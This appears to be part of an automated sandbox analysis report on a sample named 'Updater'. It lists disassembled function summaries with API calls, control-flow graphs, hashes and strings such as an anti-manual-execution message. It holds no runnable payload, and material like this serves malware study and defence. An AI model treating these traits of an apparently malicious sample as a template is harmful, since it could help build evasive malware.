                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                    • Opcode ID: 280abe6649e9f9e0bfe1de28971ac7e60159f7ba6f44f5c26d0b226779ce37b5
                                                                                                                                                    • Instruction ID: f8a720534683c68518e3aa3628f1ba11e9d7ebf632c3fd2def01ae2fae9b0397
                                                                                                                                                    • Opcode Fuzzy Hash: 280abe6649e9f9e0bfe1de28971ac7e60159f7ba6f44f5c26d0b226779ce37b5
                                                                                                                                                    • Instruction Fuzzy Hash: DD410171284104ABDB145B789C8EBBE3AD5EB04B01F2083E5F646D72A1DEB99E048765

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 871 b58b75-b58b85 872 b58b87-b58b9a call b526b9 call b526cc 871->872 873 b58b9f-b58ba1 871->873 887 b58f21 872->887 874 b58ba7-b58bad 873->874 875 b58f09-b58f16 call b526b9 call b526cc 873->875 874->875 877 b58bb3-b58bde 874->877 892 b58f1c call b52610 875->892 877->875 881 b58be4-b58bed 877->881 885 b58c07-b58c09 881->885 886 b58bef-b58c02 call b526b9 call b526cc 881->886 890 b58f05-b58f07 885->890 891 b58c0f-b58c13 885->891 886->892 893 b58f24-b58f29 887->893 890->893 891->890 895 b58c19-b58c1d 891->895 892->887 895->886 898 b58c1f-b58c36 895->898 900 b58c53-b58c5c 898->900 901 b58c38-b58c3b 898->901 902 b58c5e-b58c75 call b526b9 call b526cc call b52610 900->902 903 b58c7a-b58c84 900->903 904 b58c45-b58c4e 901->904 905 b58c3d-b58c43 901->905 936 b58e3c 902->936 908 b58c86-b58c88 903->908 909 b58c8b-b58ca9 call b5282e call b527f4 * 2 903->909 906 b58cef-b58d09 904->906 905->902 905->904 911 b58ddd-b58de6 call b5f74c 906->911 912 b58d0f-b58d1f 906->912 908->909 940 b58cc6-b58cec call b59254 909->940 941 b58cab-b58cc1 call b526cc call b526b9 909->941 923 b58e59 911->923 924 b58de8-b58dfa 911->924 912->911 916 b58d25-b58d27 912->916 916->911 920 b58d2d-b58d53 916->920 920->911 925 b58d59-b58d6c 920->925 928 b58e5d-b58e75 ReadFile 923->928 924->923 930 b58dfc-b58e0b GetConsoleMode 924->930 925->911 931 b58d6e-b58d70 925->931 934 b58e77-b58e7d 928->934 935 b58ed1-b58edc GetLastError 928->935 930->923 937 b58e0d-b58e11 930->937 931->911 932 b58d72-b58d9d 931->932 932->911 939 b58d9f-b58db2 932->939 934->935 944 b58e7f 934->944 942 b58ef5-b58ef8 935->942 943 b58ede-b58ef0 call b526cc call b526b9 935->943 938 b58e3f-b58e49 call b527f4 936->938 937->928 945 b58e13-b58e2d ReadConsoleW 937->945 938->893 939->911 947 b58db4-b58db6 939->947 940->906 941->936 954 b58e35-b58e3b call b52696 942->954 955 b58efe-b58f00 942->955 943->936 951 b58e82-b58e94 944->951 952 b58e2f GetLastError 945->952 953 b58e4e-b58e57 945->953 947->911 957 b58db8-b58dd8 947->957 951->938 961 b58e96-b58e9a 951->961 952->954 953->951 954->936 955->938 957->911 965 b58eb3-b58ebe 961->965 966 b58e9c-b58eac call b58891 961->966 971 b58ec0 call b589e1 965->971 972 b58eca-b58ecf call b586d1 965->972 978 b58eaf-b58eb1 966->978 976 b58ec5-b58ec8 971->976 972->976 976->978 978->938
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5de16bdbac08449613dbbf31b076a07d75d59f0c4f04dd6d5d09736392dcc116
                                                                                                                                                    • Instruction ID: ed723a3b3d92747e97794b31885463e6b310c7300ec343b5093fb22f24d0741b
                                                                                                                                                    • Opcode Fuzzy Hash: 5de16bdbac08449613dbbf31b076a07d75d59f0c4f04dd6d5d09736392dcc116
                                                                                                                                                    • Instruction Fuzzy Hash: 7BC1C170A05249AFDB11DFA8C881BADBBF1EF1A312F1405D8ED14B7392CB749949CB60

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxA.USER32(00000000,Executing manually will not work,0140B061,00000000), ref: 0140AE22
                                                                                                                                                    • MessageBoxA.USER32(00000000,no data,0140B061,00000000), ref: 0140AE9A
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0140AF32
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$CountTick
                                                                                                                                                    • String ID: Executing manually will not work$no data$oYvuAoJf
                                                                                                                                                    • API String ID: 1431039135-1909694823
                                                                                                                                                    • Opcode ID: 7a7e6264a80d44c768987b5b3ad90fca6b3c3bbcbfd9e5bb4529ba86cb8f67df
                                                                                                                                                    • Instruction ID: a46cea9a6b18df3ff07c8f054a3365b171662544cdb55793f21fcf95c100398e
                                                                                                                                                    • Opcode Fuzzy Hash: 7a7e6264a80d44c768987b5b3ad90fca6b3c3bbcbfd9e5bb4529ba86cb8f67df
                                                                                                                                                    • Instruction Fuzzy Hash: BF610E78A00206CFC722EBEBD590A5DB3B1EB68344F10417AE954677B8CB74AC46CB51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1064 b3fbb7-b3fc27 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B3FBE5
                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B3FC06
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00B3FC1A
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00B3FC23
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                    • Opcode ID: a62221ead202b53c872960ce8bb2c2d1ac325063d1b4fc66fd7ea8cce7e03da9
                                                                                                                                                    • Instruction ID: 86d4e338bd77042188547af254dbe5d55e5a3e81e8f6efda63b19b5f9a63f8cd
                                                                                                                                                    • Opcode Fuzzy Hash: a62221ead202b53c872960ce8bb2c2d1ac325063d1b4fc66fd7ea8cce7e03da9
                                                                                                                                                    • Instruction Fuzzy Hash: D7F0FEB19412947FEA311B176C4CE773EBDD7CBF50F10006EB900A31B0D9A90851DAB8
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,01407FB5,00000001,00000000,00000000,00000000), ref: 01403B81
                                                                                                                                                    • MessageBoxA.USER32(00000000,01403C9D,01403C99,00000000), ref: 01403B9B
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,01407FB5,00000001,00000000), ref: 01403BA3
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01403BC5
                                                                                                                                                    • MessageBoxA.USER32(00000000,01403CA1,01403C99,00000000), ref: 01403BDC
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01403C86
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Message$CloseCreateHandleReadSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2324011479-0
                                                                                                                                                    • Opcode ID: d809dae25947b1c06b9decda4c16c3937252237a62d7ab3209bd963f12a55c11
                                                                                                                                                    • Instruction ID: e4ea3d8cd1a2d85f0aff2c3fcc623fae20dc63f2d0fdcd341e3d7c6cd4a48f5d
                                                                                                                                                    • Opcode Fuzzy Hash: d809dae25947b1c06b9decda4c16c3937252237a62d7ab3209bd963f12a55c11
                                                                                                                                                    • Instruction Fuzzy Hash: 16312875648301AFD304EF1ECC85F1AB7E5FF84A14F10882DBA98DB392C674E8058A61
                                                                                                                                                    APIs
                                                                                                                                                    • ___scrt_release_startup_lock.LIBCMT ref: 00B40AA4
                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00B40AB8
                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00B40ADD
                                                                                                                                                    • ___scrt_get_show_window_mode.LIBCMT ref: 00B40AEF
                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 00B40B20
                                                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00B40B6F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4079798206-0
                                                                                                                                                    • Opcode ID: 0e070428001a945bda99c9ebb6ed0779f5086f1240bdd95704018287b286ec87
                                                                                                                                                    • Instruction ID: 59cc8db37057908b7dc7bccfbc635821ee555b6f651bc81ab770cf93d5fcbc78
                                                                                                                                                    • Opcode Fuzzy Hash: 0e070428001a945bda99c9ebb6ed0779f5086f1240bdd95704018287b286ec87
                                                                                                                                                    • Instruction Fuzzy Hash: CF213521A91301AADB2077789C02BBD33E1CF52326F2408E9F680672D3CEB54F40B665
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B35C71,SwapMouseButtons,00000004,?), ref: 00B35CA4
                                                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B35C71,SwapMouseButtons,00000004,?,?,?,?,00B34F9C), ref: 00B35CC5
                                                                                                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,00B35C71,SwapMouseButtons,00000004,?,?,?,?,00B34F9C), ref: 00B35CE7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                                                    • API String ID: 3677997916-824357125
                                                                                                                                                    • Opcode ID: bd6b2f70a1c2ded85fd0ed2718ee627f459d332c12ba8667f88b42602bc7586e
                                                                                                                                                    • Instruction ID: 3a15b0c17d3f142ec3a7d0c34d9b5fd26f593d080d9a9fa9ebdd2d4ef42f57bc
                                                                                                                                                    • Opcode Fuzzy Hash: bd6b2f70a1c2ded85fd0ed2718ee627f459d332c12ba8667f88b42602bc7586e
                                                                                                                                                    • Instruction Fuzzy Hash: 7B115775611608BFDB20DF68DC80EAFBBF8EF04704FA055A9B805D7210E6319E40ABA0
                                                                                                                                                    Strings
                                                                                                                                                    • Variable must be of type 'Object'., xrefs: 00B67FA3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                                                    • API String ID: 0-109567571
                                                                                                                                                    • Opcode ID: f7a5fcc1c1c267fff5c39f7b4f81d7feb772d46a1d13e011e218b2564e686dc7
                                                                                                                                                    • Instruction ID: a2dbb56025846a4831d97d56ae0dcdf4218ddc1aaa09c9abd9f1cc0615e99a50
                                                                                                                                                    • Opcode Fuzzy Hash: f7a5fcc1c1c267fff5c39f7b4f81d7feb772d46a1d13e011e218b2564e686dc7
                                                                                                                                                    • Instruction Fuzzy Hash: C8C2AF71E01225CFCB24DF58E880AADB7F1FF18700F2481A9E919AB351DB75AD42CB91
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140784D
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140785C
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,0140789C), ref: 0140787B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01407881
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3919263394-0
                                                                                                                                                    • Opcode ID: 57911425b7c7910d36443171246d6032c1acfec1cb0ccf03b88ce738b6a3ca5d
                                                                                                                                                    • Instruction ID: 5fedfae7f2a63b396c892d69af003a2e8309c69fc63c7428a88cea856999afa8
                                                                                                                                                    • Opcode Fuzzy Hash: 57911425b7c7910d36443171246d6032c1acfec1cb0ccf03b88ce738b6a3ca5d
                                                                                                                                                    • Instruction Fuzzy Hash: 5B111B71A44309BEE751EBBCCC82F5AB6ECEB08714F200579B654E62D1E6756E00CA20
                                                                                                                                                    APIs
                                                                                                                                                    • MessageBoxA.USER32(00000000,Executing manually will not work,0140B061,00000000), ref: 0140AE22
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message
                                                                                                                                                    • String ID: Executing manually will not work$oYvuAoJf
                                                                                                                                                    • API String ID: 2030045667-97121892
                                                                                                                                                    • Opcode ID: f0af58460b35a292bf4b1605e1d1ef144ac978ac0bd159008b19e349faac500b
                                                                                                                                                    • Instruction ID: cf7bba27408e0eeabd4f204674ce5fe9826718296fd31b211c5ed8f1c120f33e
                                                                                                                                                    • Opcode Fuzzy Hash: f0af58460b35a292bf4b1605e1d1ef144ac978ac0bd159008b19e349faac500b
                                                                                                                                                    • Instruction Fuzzy Hash: 8471C0B0988346CFD796DEA2D8426E877F0FB01339F24417FD56286162D6BD88838E41
                                                                                                                                                    APIs
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C74
                                                                                                                                                      • Part of subcall function 00B4440C: RaiseException.KERNEL32(?,?,?,00B40C96,?,00000001,?,?,?,?,?,?,00B40C96,?,00BE94C0), ref: 00B4446B
                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00B40C91
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                    • String ID: Unknown exception
                                                                                                                                                    • API String ID: 3476068407-410509341
                                                                                                                                                    • Opcode ID: 989b943aa4d7767be74cfcc551874c69c26fcafc052853f261f65686464a7438
                                                                                                                                                    • Instruction ID: ec9e50287d07e90acf0a3aa8e4ebf9d9db6dab69ae509c7b89b0cdbe220aacba
                                                                                                                                                    • Opcode Fuzzy Hash: 989b943aa4d7767be74cfcc551874c69c26fcafc052853f261f65686464a7438
                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0C26492020DFB8F14BAA4E896F5D77FCDE00314B9082F0BB24965D2EB70DB26E5D0
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00BA8D10
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00BA8D17
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 00BA8EF8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146820519-0
                                                                                                                                                    • Opcode ID: aed55d89af2d5be0533cfdea94bd0c93f49329b54017b855e1843c64fd40066d
                                                                                                                                                    • Instruction ID: 59b4a2036df329afa7e3473c27a761eaa09331158cfebdc1cbea1f4936236371
                                                                                                                                                    • Opcode Fuzzy Hash: aed55d89af2d5be0533cfdea94bd0c93f49329b54017b855e1843c64fd40066d
                                                                                                                                                    • Instruction Fuzzy Hash: EB125C71A08341DFC714DF28C484B6ABBE5FF89314F1489ADE8898B252DB35E945CF92
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B3FA2C
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B3FA34
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B3FA3F
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B3FA4A
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B3FA52
                                                                                                                                                      • Part of subcall function 00B3F9FB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B3FA5A
                                                                                                                                                      • Part of subcall function 00B3F508: RegisterWindowMessageW.USER32(00000004,?,00B293EB), ref: 00B3F560
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B29488
                                                                                                                                                    • OleInitialize.OLE32 ref: 00B294A6
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00B68D75
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1986988660-0
                                                                                                                                                    • Opcode ID: 448b719e703a9a31462c429d6dda2cc5fc14f445fe15b2e961b8384ab7cbd02c
                                                                                                                                                    • Instruction ID: 8e3cff9b37550ec2f9ca815b8bdbf911fc47a6fd2bcd57fde7a46d432993e9d2
                                                                                                                                                    • Opcode Fuzzy Hash: 448b719e703a9a31462c429d6dda2cc5fc14f445fe15b2e961b8384ab7cbd02c
                                                                                                                                                    • Instruction Fuzzy Hash: 4B719AB19122058FD388EF79BD6A6753BE1FB6834071086BAE508C7361EF744949CF54
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00B31D9F
                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001), ref: 00B31DAF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 152b8adbe05012fafcbb0bf26109582710007d3a9b82f2bde3cc9cef2aeb271c
                                                                                                                                                    • Instruction ID: 6d9290b01ef03d7fdd94392664712c45a14b1b0009c246d9bfa8c4a67d0633d2
